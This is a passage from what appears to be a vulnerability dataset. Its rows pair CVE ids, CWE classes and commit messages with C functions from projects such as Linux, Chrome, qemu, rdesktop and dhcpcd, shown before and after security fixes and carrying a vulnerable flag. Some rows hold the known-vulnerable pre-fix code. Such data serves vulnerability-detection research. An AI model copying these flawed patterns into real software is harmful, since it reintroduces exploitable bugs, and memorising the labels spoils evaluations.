(c ^ pad) & ~cmask; /* ... and padding */ cmask &= ((int)(off - 1 - j)) >> (sizeof(int) * 8 - 1); res |= (c ^ pmac->c[i]) & cmask; i += 1 & cmask; } maxpad -= SHA256_DIGEST_LENGTH; res = 0 - ((0 - res) >> (sizeof(res) * 8 - 1)); ret &= (int)~res; } # else for (res = 0, i = 0; i < SHA256_DIGEST_LENGTH; i++) res |= out[i] ^ pmac->c[i]; res = 0 - ((0 - res) >> (sizeof(res) * 8 - 1)); ret &= (int)~res; /* verify padding */ pad = (pad & ~res) | (maxpad & res); out = out + len - 1 - pad; for (res = 0, i = 0; i < pad; i++) res |= out[i] ^ pad; res = (0 - res) >> (sizeof(res) * 8 - 1); ret &= (int)~res; # endif return ret; } else { SHA256_Update(&key->md, out, len); } } return 1; }
C
openssl
1
CVE-2013-4588
https://www.cvedetails.com/cve/CVE-2013-4588/
CWE-119
https://github.com/torvalds/linux/commit/04bcef2a83f40c6db24222b27a52892cba39dffb
04bcef2a83f40c6db24222b27a52892cba39dffb
ipvs: Add boundary check on ioctl arguments The ipvs code has a nifty system for doing the size of ioctl command copies; it defines an array with values into which it indexes the cmd to find the right length. Unfortunately, the ipvs code forgot to check if the cmd was in the range that the array provides, allowing for an index outside of the array, which then gives a "garbage" result into the length, which then gets used for copying into a stack buffer. Fix this by adding sanity checks on these as well as the copy size. [ [email protected]: adjusted limit to IP_VS_SO_GET_MAX ] Signed-off-by: Arjan van de Ven <[email protected]> Acked-by: Julian Anastasov <[email protected]> Signed-off-by: Simon Horman <[email protected]> Signed-off-by: Patrick McHardy <[email protected]>
static int ip_vs_info_open(struct inode *inode, struct file *file) { return seq_open_private(file, &ip_vs_info_seq_ops, sizeof(struct ip_vs_iter)); }
static int ip_vs_info_open(struct inode *inode, struct file *file) { return seq_open_private(file, &ip_vs_info_seq_ops, sizeof(struct ip_vs_iter)); }
C
linux
0
CVE-2013-6626
https://www.cvedetails.com/cve/CVE-2013-6626/
null
https://github.com/chromium/chromium/commit/90fb08ed0146c9beacfd4dde98a20fc45419fff3
90fb08ed0146c9beacfd4dde98a20fc45419fff3
Cancel JavaScript dialogs when an interstitial appears. BUG=295695 TEST=See bug for repro steps. Review URL: https://chromiumcodereview.appspot.com/24360011 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@225026 0039d316-1c4b-4281-b951-d872f2087c98
gfx::NativeViewAccessible WebContentsImpl::GetParentNativeViewAccessible() { return accessible_parent_; }
gfx::NativeViewAccessible WebContentsImpl::GetParentNativeViewAccessible() { return accessible_parent_; }
C
Chrome
0
CVE-2017-8284
https://www.cvedetails.com/cve/CVE-2017-8284/
CWE-94
https://github.com/qemu/qemu/commit/30663fd26c0307e414622c7a8607fbc04f92ec14
30663fd26c0307e414622c7a8607fbc04f92ec14
tcg/i386: Check the size of instruction being translated This fixes the bug: 'user-to-root privesc inside VM via bad translation caching' reported by Jann Horn here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1122 Reviewed-by: Richard Henderson <[email protected]> CC: Peter Maydell <[email protected]> CC: Paolo Bonzini <[email protected]> Reported-by: Jann Horn <[email protected]> Signed-off-by: Pranith Kumar <[email protected]> Message-Id: <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
static void gen_exts(TCGMemOp ot, TCGv reg) { gen_ext_tl(reg, reg, ot, true); }
static void gen_exts(TCGMemOp ot, TCGv reg) { gen_ext_tl(reg, reg, ot, true); }
C
qemu
0
CVE-2018-20815
https://www.cvedetails.com/cve/CVE-2018-20815/
CWE-119
https://git.qemu.org/?p=qemu.git;a=commitdiff;h=da885fe1ee8b4589047484bd7fa05a4905b52b17
da885fe1ee8b4589047484bd7fa05a4905b52b17
null
static int findnode_nofail(void *fdt, const char *node_path) { int offset; offset = fdt_path_offset(fdt, node_path); if (offset < 0) { error_report("%s Couldn't find node %s: %s", __func__, node_path, fdt_strerror(offset)); exit(1); } return offset; }
static int findnode_nofail(void *fdt, const char *node_path) { int offset; offset = fdt_path_offset(fdt, node_path); if (offset < 0) { error_report("%s Couldn't find node %s: %s", __func__, node_path, fdt_strerror(offset)); exit(1); } return offset; }
C
qemu
0
CVE-2018-20182
https://www.cvedetails.com/cve/CVE-2018-20182/
CWE-119
https://github.com/rdesktop/rdesktop/commit/4dca546d04321a610c1835010b5dad85163b65e1
4dca546d04321a610c1835010b5dad85163b65e1
Malicious RDP server security fixes This commit includes fixes for a set of 21 vulnerabilities in rdesktop when a malicious RDP server is used. All vulnerabilities was identified and reported by Eyal Itkin. * Add rdp_protocol_error function that is used in several fixes * Refactor of process_bitmap_updates * Fix possible integer overflow in s_check_rem() on 32bit arch * Fix memory corruption in process_bitmap_data - CVE-2018-8794 * Fix remote code execution in process_bitmap_data - CVE-2018-8795 * Fix remote code execution in process_plane - CVE-2018-8797 * Fix Denial of Service in mcs_recv_connect_response - CVE-2018-20175 * Fix Denial of Service in mcs_parse_domain_params - CVE-2018-20175 * Fix Denial of Service in sec_parse_crypt_info - CVE-2018-20176 * Fix Denial of Service in sec_recv - CVE-2018-20176 * Fix minor information leak in rdpdr_process - CVE-2018-8791 * Fix Denial of Service in cssp_read_tsrequest - CVE-2018-8792 * Fix remote code execution in cssp_read_tsrequest - CVE-2018-8793 * Fix Denial of Service in process_bitmap_data - CVE-2018-8796 * Fix minor information leak in rdpsnd_process_ping - CVE-2018-8798 * Fix Denial of Service in process_secondary_order - CVE-2018-8799 * Fix remote code execution in in ui_clip_handle_data - CVE-2018-8800 * Fix major information leak in ui_clip_handle_data - CVE-2018-20174 * Fix memory corruption in rdp_in_unistr - CVE-2018-20177 * Fix Denial of Service in process_demand_active - CVE-2018-20178 * Fix remote code execution in lspci_process - CVE-2018-20179 * Fix remote code execution in rdpsnddbg_process - CVE-2018-20180 * Fix remote code execution in seamless_process - CVE-2018-20181 * Fix remote code execution in seamless_process_line - CVE-2018-20182
rdpdr_send_client_device_list_announce(void) { /* DR_CORE_CLIENT_ANNOUNCE_RSP */ uint32 bloblen, disklen, flags; size_t i; STREAM s; PRINTER *printerinfo; DISK_DEVICE *diskinfo; struct stream drv = { 0 }, prt = { 0}; s = channel_init(rdpdr_channel, announcedata_size()); out_uint16_le(s, RDPDR_CTYP_CORE); out_uint16_le(s, PAKID_CORE_DEVICE_LIST_ANNOUNCE); out_uint32_le(s, g_num_devices); for (i = 0; i < g_num_devices; i++) /* DEVICE_ANNOUNCE */ { out_uint32_le(s, g_rdpdr_device[i].device_type); out_uint32_le(s, i); /* RDP Device ID */ out_uint8p(s, g_rdpdr_device[i].name, 8); /* preferredDosName, limited to 8 characters */ switch (g_rdpdr_device[i].device_type) { case DEVICE_TYPE_DISK: diskinfo = (DISK_DEVICE *) g_rdpdr_device[i].pdevice_data; /* The RDP specification says that the DeviceData is supposed to be a null-terminated Unicode string, but that does not work. In practice the string is expected to be an ASCII string, like a variable-length preferredDosName. */ disklen = strlen(diskinfo->name) + 1; out_uint32_le(s, disklen); /* DeviceDataLength */ out_uint8p(s, diskinfo->name, disklen); /* DeviceData */ break; case DEVICE_TYPE_PRINTER: printerinfo = (PRINTER *) g_rdpdr_device[i].pdevice_data; s_realloc(&prt, 512 * 4); s_reset(&prt); out_utf16s(&prt, printerinfo->printer); s_mark_end(&prt); s_realloc(&drv, 512 * 4); s_reset(&drv); out_utf16s(&drv, printerinfo->driver); s_mark_end(&drv); bloblen = printerinfo->bloblen; flags = 0; if (printerinfo->default_printer) flags |= RDPDR_PRINTER_ANNOUNCE_FLAG_DEFAULTPRINTER; out_uint32_le(s, 24 + s_length(&drv) + s_length(&prt) + bloblen); /* DeviceDataLength */ out_uint32_le(s, flags); /* Flags */ out_uint32_le(s, 0); /* Codepage */ out_uint32_le(s, 0); /* PnPNameLen */ out_uint32_le(s, s_length(&drv)); /* DriverNameLen */ out_uint32_le(s, s_length(&prt)); /* PrinterNameLen */ out_uint32_le(s, bloblen); /* CachedFieldsLen */ out_stream(s, &drv); /* DriverName */ out_stream(s, &prt); /* PrinterName */ out_uint8a(s, printerinfo->blob, bloblen); /* CachedPrinterConfigData */ if (printerinfo->blob) xfree(printerinfo->blob); /* Blob is sent twice if reconnecting */ break; default: out_uint32(s, 0); } } s_mark_end(s); channel_send(s, rdpdr_channel); }
rdpdr_send_client_device_list_announce(void) { /* DR_CORE_CLIENT_ANNOUNCE_RSP */ uint32 bloblen, disklen, flags; size_t i; STREAM s; PRINTER *printerinfo; DISK_DEVICE *diskinfo; struct stream drv = { 0 }, prt = { 0}; s = channel_init(rdpdr_channel, announcedata_size()); out_uint16_le(s, RDPDR_CTYP_CORE); out_uint16_le(s, PAKID_CORE_DEVICE_LIST_ANNOUNCE); out_uint32_le(s, g_num_devices); for (i = 0; i < g_num_devices; i++) /* DEVICE_ANNOUNCE */ { out_uint32_le(s, g_rdpdr_device[i].device_type); out_uint32_le(s, i); /* RDP Device ID */ out_uint8p(s, g_rdpdr_device[i].name, 8); /* preferredDosName, limited to 8 characters */ switch (g_rdpdr_device[i].device_type) { case DEVICE_TYPE_DISK: diskinfo = (DISK_DEVICE *) g_rdpdr_device[i].pdevice_data; /* The RDP specification says that the DeviceData is supposed to be a null-terminated Unicode string, but that does not work. In practice the string is expected to be an ASCII string, like a variable-length preferredDosName. */ disklen = strlen(diskinfo->name) + 1; out_uint32_le(s, disklen); /* DeviceDataLength */ out_uint8p(s, diskinfo->name, disklen); /* DeviceData */ break; case DEVICE_TYPE_PRINTER: printerinfo = (PRINTER *) g_rdpdr_device[i].pdevice_data; s_realloc(&prt, 512 * 4); s_reset(&prt); out_utf16s(&prt, printerinfo->printer); s_mark_end(&prt); s_realloc(&drv, 512 * 4); s_reset(&drv); out_utf16s(&drv, printerinfo->driver); s_mark_end(&drv); bloblen = printerinfo->bloblen; flags = 0; if (printerinfo->default_printer) flags |= RDPDR_PRINTER_ANNOUNCE_FLAG_DEFAULTPRINTER; out_uint32_le(s, 24 + s_length(&drv) + s_length(&prt) + bloblen); /* DeviceDataLength */ out_uint32_le(s, flags); /* Flags */ out_uint32_le(s, 0); /* Codepage */ out_uint32_le(s, 0); /* PnPNameLen */ out_uint32_le(s, s_length(&drv)); /* DriverNameLen */ out_uint32_le(s, s_length(&prt)); /* PrinterNameLen */ out_uint32_le(s, bloblen); /* CachedFieldsLen */ out_stream(s, &drv); /* DriverName */ out_stream(s, &prt); /* PrinterName */ out_uint8a(s, printerinfo->blob, bloblen); /* CachedPrinterConfigData */ if (printerinfo->blob) xfree(printerinfo->blob); /* Blob is sent twice if reconnecting */ break; default: out_uint32(s, 0); } } s_mark_end(s); channel_send(s, rdpdr_channel); }
C
rdesktop
0
null
null
null
https://github.com/chromium/chromium/commit/283fb25624bf253d120708152e23cf9143519198
283fb25624bf253d120708152e23cf9143519198
Coverity; Fixing pass by value bugs. CID=101466, 101464, 101494, 101495, 101496, 101497 BUG=NONE TEST=NONE Review URL: http://codereview.chromium.org/8956046 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@115399 0039d316-1c4b-4281-b951-d872f2087c98
string16 ExtensionInstallUI::Prompt::GetPermission(int index) const { return l10n_util::GetStringFUTF16( IDS_EXTENSION_PERMISSION_LINE, permissions_[index]); }
string16 ExtensionInstallUI::Prompt::GetPermission(int index) const { return l10n_util::GetStringFUTF16( IDS_EXTENSION_PERMISSION_LINE, permissions_[index]); }
C
Chrome
0
CVE-2018-19497
https://www.cvedetails.com/cve/CVE-2018-19497/
CWE-125
https://github.com/sleuthkit/sleuthkit/commit/bc04aa017c0bd297de8a3b7fc40ffc6ddddbb95d
bc04aa017c0bd297de8a3b7fc40ffc6ddddbb95d
Merge pull request #1374 from JordyZomer/develop Fix CVE-2018-19497.
hfs_attrTypeName(uint32_t typeNum) { switch (typeNum) { case TSK_FS_ATTR_TYPE_HFS_DEFAULT: return "DFLT"; case TSK_FS_ATTR_TYPE_HFS_DATA: return "DATA"; case TSK_FS_ATTR_TYPE_HFS_EXT_ATTR: return "ExATTR"; case TSK_FS_ATTR_TYPE_HFS_COMP_REC: return "CMPF"; case TSK_FS_ATTR_TYPE_HFS_RSRC: return "RSRC"; default: return "UNKN"; } }
hfs_attrTypeName(uint32_t typeNum) { switch (typeNum) { case TSK_FS_ATTR_TYPE_HFS_DEFAULT: return "DFLT"; case TSK_FS_ATTR_TYPE_HFS_DATA: return "DATA"; case TSK_FS_ATTR_TYPE_HFS_EXT_ATTR: return "ExATTR"; case TSK_FS_ATTR_TYPE_HFS_COMP_REC: return "CMPF"; case TSK_FS_ATTR_TYPE_HFS_RSRC: return "RSRC"; default: return "UNKN"; } }
C
sleuthkit
0
CVE-2015-6787
https://www.cvedetails.com/cve/CVE-2015-6787/
null
https://github.com/chromium/chromium/commit/f911e11e7f6b5c0d6f5ee694a9871de6619889f7
f911e11e7f6b5c0d6f5ee694a9871de6619889f7
Reland "[CI] Make paint property nodes non-ref-counted" This reverts commit 887383b30842d9d9006e11bb6932660a3cb5b1b7. Reason for revert: Retry in M69. Original change's description: > Revert "[CI] Make paint property nodes non-ref-counted" > > This reverts commit 70fc0b018c9517558b7aa2be00edf2debb449123. > > Reason for revert: Caused bugs found by clusterfuzz > > Original change's description: > > [CI] Make paint property nodes non-ref-counted > > > > Now all paint property nodes are owned by ObjectPaintProperties > > (and LocalFrameView temporarily before removing non-RLS mode). > > Others just use raw pointers or references. > > > > Bug: 833496 > > Cq-Include-Trybots: master.tryserver.blink:linux_trusty_blink_rel;master.tryserver.chromium.linux:linux_layout_tests_slimming_paint_v2 > > Change-Id: I2d544fe153bb94698623248748df63c8aa2081ae > > Reviewed-on: https://chromium-review.googlesource.com/1031101 > > Reviewed-by: Tien-Ren Chen <[email protected]> > > Commit-Queue: Xianzhu Wang <[email protected]> > > Cr-Commit-Position: refs/heads/master@{#554626} > > [email protected],[email protected],[email protected] > > Change-Id: I02bb50d6744cb81a797246a0116b677e80a3c69f > No-Presubmit: true > No-Tree-Checks: true > No-Try: true > Bug: 833496,837932,837943 > Cq-Include-Trybots: master.tryserver.blink:linux_trusty_blink_rel;master.tryserver.chromium.linux:linux_layout_tests_slimming_paint_v2 > Reviewed-on: https://chromium-review.googlesource.com/1034292 > Reviewed-by: Xianzhu Wang <[email protected]> > Commit-Queue: Xianzhu Wang <[email protected]> > Cr-Commit-Position: refs/heads/master@{#554653} [email protected],[email protected],[email protected] # Not skipping CQ checks because original CL landed > 1 day ago. Bug: 833496, 837932, 837943 Change-Id: I0b4ef70db1f1f211ba97c30d617225355c750992 Cq-Include-Trybots: master.tryserver.blink:linux_trusty_blink_rel;master.tryserver.chromium.linux:linux_layout_tests_slimming_paint_v2 Reviewed-on: https://chromium-review.googlesource.com/1083491 Commit-Queue: Xianzhu Wang <[email protected]> Reviewed-by: Xianzhu Wang <[email protected]> Cr-Commit-Position: refs/heads/master@{#563930}
CompositedLayerRasterInvalidatorTest& Properties( const TransformPaintPropertyNode& t, const ClipPaintPropertyNode& c, const EffectPaintPropertyNode& e) { Properties(PropertyTreeState(&t, &c, &e)); return *this; }
CompositedLayerRasterInvalidatorTest& Properties( const RefCountedPropertyTreeState& state) { data_.chunks.back().properties = state; return *this; }
C
Chrome
1
CVE-2019-7308
https://www.cvedetails.com/cve/CVE-2019-7308/
CWE-189
https://github.com/torvalds/linux/commit/d3bd7413e0ca40b60cf60d4003246d067cafdeda
d3bd7413e0ca40b60cf60d4003246d067cafdeda
bpf: fix sanitation of alu op with pointer / scalar type from different paths While 979d63d50c0c ("bpf: prevent out of bounds speculation on pointer arithmetic") took care of rejecting alu op on pointer when e.g. pointer came from two different map values with different map properties such as value size, Jann reported that a case was not covered yet when a given alu op is used in both "ptr_reg += reg" and "numeric_reg += reg" from different branches where we would incorrectly try to sanitize based on the pointer's limit. Catch this corner case and reject the program instead. Fixes: 979d63d50c0c ("bpf: prevent out of bounds speculation on pointer arithmetic") Reported-by: Jann Horn <[email protected]> Signed-off-by: Daniel Borkmann <[email protected]> Acked-by: Alexei Starovoitov <[email protected]> Signed-off-by: Alexei Starovoitov <[email protected]>
static void clean_func_state(struct bpf_verifier_env *env, struct bpf_func_state *st) { enum bpf_reg_liveness live; int i, j; for (i = 0; i < BPF_REG_FP; i++) { live = st->regs[i].live; /* liveness must not touch this register anymore */ st->regs[i].live |= REG_LIVE_DONE; if (!(live & REG_LIVE_READ)) /* since the register is unused, clear its state * to make further comparison simpler */ __mark_reg_not_init(&st->regs[i]); } for (i = 0; i < st->allocated_stack / BPF_REG_SIZE; i++) { live = st->stack[i].spilled_ptr.live; /* liveness must not touch this stack slot anymore */ st->stack[i].spilled_ptr.live |= REG_LIVE_DONE; if (!(live & REG_LIVE_READ)) { __mark_reg_not_init(&st->stack[i].spilled_ptr); for (j = 0; j < BPF_REG_SIZE; j++) st->stack[i].slot_type[j] = STACK_INVALID; } } }
static void clean_func_state(struct bpf_verifier_env *env, struct bpf_func_state *st) { enum bpf_reg_liveness live; int i, j; for (i = 0; i < BPF_REG_FP; i++) { live = st->regs[i].live; /* liveness must not touch this register anymore */ st->regs[i].live |= REG_LIVE_DONE; if (!(live & REG_LIVE_READ)) /* since the register is unused, clear its state * to make further comparison simpler */ __mark_reg_not_init(&st->regs[i]); } for (i = 0; i < st->allocated_stack / BPF_REG_SIZE; i++) { live = st->stack[i].spilled_ptr.live; /* liveness must not touch this stack slot anymore */ st->stack[i].spilled_ptr.live |= REG_LIVE_DONE; if (!(live & REG_LIVE_READ)) { __mark_reg_not_init(&st->stack[i].spilled_ptr); for (j = 0; j < BPF_REG_SIZE; j++) st->stack[i].slot_type[j] = STACK_INVALID; } } }
C
linux
0
CVE-2017-8071
https://www.cvedetails.com/cve/CVE-2017-8071/
CWE-404
https://github.com/torvalds/linux/commit/7a7b5df84b6b4e5d599c7289526eed96541a0654
7a7b5df84b6b4e5d599c7289526eed96541a0654
HID: cp2112: fix sleep-while-atomic A recent commit fixing DMA-buffers on stack added a shared transfer buffer protected by a spinlock. This is broken as the USB HID request callbacks can sleep. Fix this up by replacing the spinlock with a mutex. Fixes: 1ffb3c40ffb5 ("HID: cp2112: make transfer buffers DMA capable") Cc: stable <[email protected]> # 4.9 Signed-off-by: Johan Hovold <[email protected]> Reviewed-by: Benjamin Tissoires <[email protected]> Signed-off-by: Jiri Kosina <[email protected]>
static int cp2112_gpio_get_all(struct gpio_chip *chip) { struct cp2112_device *dev = gpiochip_get_data(chip); struct hid_device *hdev = dev->hdev; u8 *buf = dev->in_out_buffer; int ret; mutex_lock(&dev->lock); ret = hid_hw_raw_request(hdev, CP2112_GPIO_GET, buf, CP2112_GPIO_GET_LENGTH, HID_FEATURE_REPORT, HID_REQ_GET_REPORT); if (ret != CP2112_GPIO_GET_LENGTH) { hid_err(hdev, "error requesting GPIO values: %d\n", ret); ret = ret < 0 ? ret : -EIO; goto exit; } ret = buf[1]; exit: mutex_unlock(&dev->lock); return ret; }
static int cp2112_gpio_get_all(struct gpio_chip *chip) { struct cp2112_device *dev = gpiochip_get_data(chip); struct hid_device *hdev = dev->hdev; u8 *buf = dev->in_out_buffer; unsigned long flags; int ret; spin_lock_irqsave(&dev->lock, flags); ret = hid_hw_raw_request(hdev, CP2112_GPIO_GET, buf, CP2112_GPIO_GET_LENGTH, HID_FEATURE_REPORT, HID_REQ_GET_REPORT); if (ret != CP2112_GPIO_GET_LENGTH) { hid_err(hdev, "error requesting GPIO values: %d\n", ret); ret = ret < 0 ? ret : -EIO; goto exit; } ret = buf[1]; exit: spin_unlock_irqrestore(&dev->lock, flags); return ret; }
C
linux
1
CVE-2016-5219
https://www.cvedetails.com/cve/CVE-2016-5219/
CWE-416
https://github.com/chromium/chromium/commit/a4150b688a754d3d10d2ca385155b1c95d77d6ae
a4150b688a754d3d10d2ca385155b1c95d77d6ae
Add GL_PROGRAM_COMPLETION_QUERY_CHROMIUM This makes the query of GL_COMPLETION_STATUS_KHR to programs much cheaper by minimizing the round-trip to the GPU thread. Bug: 881152, 957001 Change-Id: Iadfa798af29225e752c710ca5c25f50b3dd3101a Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1586630 Commit-Queue: Kenneth Russell <[email protected]> Reviewed-by: Kentaro Hara <[email protected]> Reviewed-by: Geoff Lang <[email protected]> Reviewed-by: Kenneth Russell <[email protected]> Cr-Commit-Position: refs/heads/master@{#657568}
error::Error GLES2DecoderPassthroughImpl::DoTexStorage2DImageCHROMIUM( GLenum target, GLenum internalFormat, GLenum bufferUsage, GLsizei width, GLsizei height) { NOTIMPLEMENTED(); return error::kNoError; }
error::Error GLES2DecoderPassthroughImpl::DoTexStorage2DImageCHROMIUM( GLenum target, GLenum internalFormat, GLenum bufferUsage, GLsizei width, GLsizei height) { NOTIMPLEMENTED(); return error::kNoError; }
C
Chrome
0
CVE-2015-5156
https://www.cvedetails.com/cve/CVE-2015-5156/
CWE-119
https://github.com/torvalds/linux/commit/48900cb6af4282fa0fb6ff4d72a81aa3dadb5c39
48900cb6af4282fa0fb6ff4d72a81aa3dadb5c39
virtio-net: drop NETIF_F_FRAGLIST virtio declares support for NETIF_F_FRAGLIST, but assumes that there are at most MAX_SKB_FRAGS + 2 fragments which isn't always true with a fraglist. A longer fraglist in the skb will make the call to skb_to_sgvec overflow the sg array, leading to memory corruption. Drop NETIF_F_FRAGLIST so we only get what we can handle. Cc: Michael S. Tsirkin <[email protected]> Signed-off-by: Jason Wang <[email protected]> Acked-by: Michael S. Tsirkin <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static struct sk_buff *receive_big(struct net_device *dev, struct virtnet_info *vi, struct receive_queue *rq, void *buf, unsigned int len) { struct page *page = buf; struct sk_buff *skb = page_to_skb(vi, rq, page, 0, len, PAGE_SIZE); if (unlikely(!skb)) goto err; return skb; err: dev->stats.rx_dropped++; give_pages(rq, page); return NULL; }
static struct sk_buff *receive_big(struct net_device *dev, struct virtnet_info *vi, struct receive_queue *rq, void *buf, unsigned int len) { struct page *page = buf; struct sk_buff *skb = page_to_skb(vi, rq, page, 0, len, PAGE_SIZE); if (unlikely(!skb)) goto err; return skb; err: dev->stats.rx_dropped++; give_pages(rq, page); return NULL; }
C
linux
0
CVE-2018-7757
https://www.cvedetails.com/cve/CVE-2018-7757/
CWE-772
https://github.com/torvalds/linux/commit/4a491b1ab11ca0556d2fda1ff1301e862a2d44c4
4a491b1ab11ca0556d2fda1ff1301e862a2d44c4
scsi: libsas: fix memory leak in sas_smp_get_phy_events() We've got a memory leak with the following producer: while true; do cat /sys/class/sas_phy/phy-1:0:12/invalid_dword_count >/dev/null; done The buffer req is allocated and not freed after we return. Fix it. Fixes: 2908d778ab3e ("[SCSI] aic94xx: new driver") Signed-off-by: Jason Yan <[email protected]> CC: John Garry <[email protected]> CC: chenqilin <[email protected]> CC: chenxiang <[email protected]> Reviewed-by: Christoph Hellwig <[email protected]> Reviewed-by: Hannes Reinecke <[email protected]> Signed-off-by: Martin K. Petersen <[email protected]>
static int sas_ex_general(struct domain_device *dev) { u8 *rg_req; struct smp_resp *rg_resp; int res; int i; rg_req = alloc_smp_req(RG_REQ_SIZE); if (!rg_req) return -ENOMEM; rg_resp = alloc_smp_resp(RG_RESP_SIZE); if (!rg_resp) { kfree(rg_req); return -ENOMEM; } rg_req[1] = SMP_REPORT_GENERAL; for (i = 0; i < 5; i++) { res = smp_execute_task(dev, rg_req, RG_REQ_SIZE, rg_resp, RG_RESP_SIZE); if (res) { SAS_DPRINTK("RG to ex %016llx failed:0x%x\n", SAS_ADDR(dev->sas_addr), res); goto out; } else if (rg_resp->result != SMP_RESP_FUNC_ACC) { SAS_DPRINTK("RG:ex %016llx returned SMP result:0x%x\n", SAS_ADDR(dev->sas_addr), rg_resp->result); res = rg_resp->result; goto out; } ex_assign_report_general(dev, rg_resp); if (dev->ex_dev.configuring) { SAS_DPRINTK("RG: ex %llx self-configuring...\n", SAS_ADDR(dev->sas_addr)); schedule_timeout_interruptible(5*HZ); } else break; } out: kfree(rg_req); kfree(rg_resp); return res; }
static int sas_ex_general(struct domain_device *dev) { u8 *rg_req; struct smp_resp *rg_resp; int res; int i; rg_req = alloc_smp_req(RG_REQ_SIZE); if (!rg_req) return -ENOMEM; rg_resp = alloc_smp_resp(RG_RESP_SIZE); if (!rg_resp) { kfree(rg_req); return -ENOMEM; } rg_req[1] = SMP_REPORT_GENERAL; for (i = 0; i < 5; i++) { res = smp_execute_task(dev, rg_req, RG_REQ_SIZE, rg_resp, RG_RESP_SIZE); if (res) { SAS_DPRINTK("RG to ex %016llx failed:0x%x\n", SAS_ADDR(dev->sas_addr), res); goto out; } else if (rg_resp->result != SMP_RESP_FUNC_ACC) { SAS_DPRINTK("RG:ex %016llx returned SMP result:0x%x\n", SAS_ADDR(dev->sas_addr), rg_resp->result); res = rg_resp->result; goto out; } ex_assign_report_general(dev, rg_resp); if (dev->ex_dev.configuring) { SAS_DPRINTK("RG: ex %llx self-configuring...\n", SAS_ADDR(dev->sas_addr)); schedule_timeout_interruptible(5*HZ); } else break; } out: kfree(rg_req); kfree(rg_resp); return res; }
C
linux
0
CVE-2018-16435
https://www.cvedetails.com/cve/CVE-2018-16435/
CWE-190
https://github.com/mm2/Little-CMS/commit/768f70ca405cd3159d990e962d54456773bb8cf8
768f70ca405cd3159d990e962d54456773bb8cf8
Upgrade Visual studio 2017 15.8 - Upgrade to 15.8 - Add check on CGATS memory allocation (thanks to Quang Nguyen for pointing out this)
void CMSEXPORT cmsIT8Free(cmsHANDLE hIT8) { cmsIT8* it8 = (cmsIT8*) hIT8; if (it8 == NULL) return; if (it8->MemorySink) { OWNEDMEM* p; OWNEDMEM* n; for (p = it8->MemorySink; p != NULL; p = n) { n = p->Next; if (p->Ptr) _cmsFree(it8 ->ContextID, p->Ptr); _cmsFree(it8 ->ContextID, p); } } if (it8->MemoryBlock) _cmsFree(it8 ->ContextID, it8->MemoryBlock); _cmsFree(it8 ->ContextID, it8); }
void CMSEXPORT cmsIT8Free(cmsHANDLE hIT8) { cmsIT8* it8 = (cmsIT8*) hIT8; if (it8 == NULL) return; if (it8->MemorySink) { OWNEDMEM* p; OWNEDMEM* n; for (p = it8->MemorySink; p != NULL; p = n) { n = p->Next; if (p->Ptr) _cmsFree(it8 ->ContextID, p->Ptr); _cmsFree(it8 ->ContextID, p); } } if (it8->MemoryBlock) _cmsFree(it8 ->ContextID, it8->MemoryBlock); _cmsFree(it8 ->ContextID, it8); }
C
Little-CMS
0
CVE-2016-1503
https://www.cvedetails.com/cve/CVE-2016-1503/
CWE-119
https://android.googlesource.com/platform/external/dhcpcd/+/1390ace71179f04a09c300ee8d0300aa69d9db09
1390ace71179f04a09c300ee8d0300aa69d9db09
Improve length checks in DHCP Options parsing of dhcpcd. Bug: 26461634 Change-Id: Ic4c2eb381a6819e181afc8ab13891f3fc58b7deb
configure_env(char **env, const char *prefix, const struct dhcp_message *dhcp, const struct if_options *ifo) { unsigned int i; const uint8_t *p; int pl; struct in_addr addr; struct in_addr net; struct in_addr brd; char *val, *v; const struct dhcp_opt *opt; ssize_t len, e = 0; char **ep; char cidr[4]; uint8_t overl = 0; get_option_uint8(&overl, dhcp, DHO_OPTIONSOVERLOADED); if (!env) { for (opt = dhcp_opts; opt->option; opt++) { if (!opt->var) continue; if (has_option_mask(ifo->nomask, opt->option)) continue; if (get_option_raw(dhcp, opt->option)) e++; } if (dhcp->yiaddr || dhcp->ciaddr) e += 5; if (*dhcp->bootfile && !(overl & 1)) e++; if (*dhcp->servername && !(overl & 2)) e++; return e; } ep = env; if (dhcp->yiaddr || dhcp->ciaddr) { /* Set some useful variables that we derive from the DHCP * message but are not necessarily in the options */ addr.s_addr = dhcp->yiaddr ? dhcp->yiaddr : dhcp->ciaddr; setvar(&ep, prefix, "ip_address", inet_ntoa(addr)); if (get_option_addr(&net, dhcp, DHO_SUBNETMASK) == -1) { net.s_addr = get_netmask(addr.s_addr); setvar(&ep, prefix, "subnet_mask", inet_ntoa(net)); } i = inet_ntocidr(net); snprintf(cidr, sizeof(cidr), "%d", inet_ntocidr(net)); setvar(&ep, prefix, "subnet_cidr", cidr); if (get_option_addr(&brd, dhcp, DHO_BROADCAST) == -1) { brd.s_addr = addr.s_addr | ~net.s_addr; setvar(&ep, prefix, "broadcast_address", inet_ntoa(brd)); } addr.s_addr = dhcp->yiaddr & net.s_addr; setvar(&ep, prefix, "network_number", inet_ntoa(addr)); } if (*dhcp->bootfile && !(overl & 1)) setvar(&ep, prefix, "filename", (const char *)dhcp->bootfile); if (*dhcp->servername && !(overl & 2)) setvar(&ep, prefix, "server_name", (const char *)dhcp->servername); for (opt = dhcp_opts; opt->option; opt++) { if (!opt->var) continue; if (has_option_mask(ifo->nomask, opt->option)) continue; val = NULL; p = get_option(dhcp, opt->option, &pl, NULL); if (!p) continue; /* We only want the FQDN name */ if (opt->option == DHO_FQDN) { p += 3; pl -= 3; } len = print_option(NULL, 0, opt->type, pl, p); if (len < 0) return -1; e = strlen(prefix) + strlen(opt->var) + len + 4; v = val = *ep++ = xmalloc(e); v += snprintf(val, e, "%s_%s=", prefix, opt->var); if (len != 0) print_option(v, len, opt->type, pl, p); } return ep - env; }
